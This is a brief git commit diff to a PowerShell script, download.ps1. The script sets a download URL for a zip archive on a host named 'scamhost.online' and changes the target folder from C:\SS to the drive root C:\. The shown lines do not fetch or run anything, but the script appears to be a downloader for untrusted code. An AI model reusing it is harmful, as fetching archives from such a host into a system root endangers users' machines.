Update download.ps1

This commit is contained in:
2026-04-28 01:29:59 +00:00
parent 03d7a86346
commit d4b030a8dc

View File

@@ -1,5 +1,5 @@
$url = "https://git.scamhost.online/fear/apps/archive/beta.zip"
$destPath = "C:\SS"
$destPath = "C:\"
$zipFile = "$destPath\archive.zip"
New-Item -ItemType Directory -Force -Path $destPath | Out-Null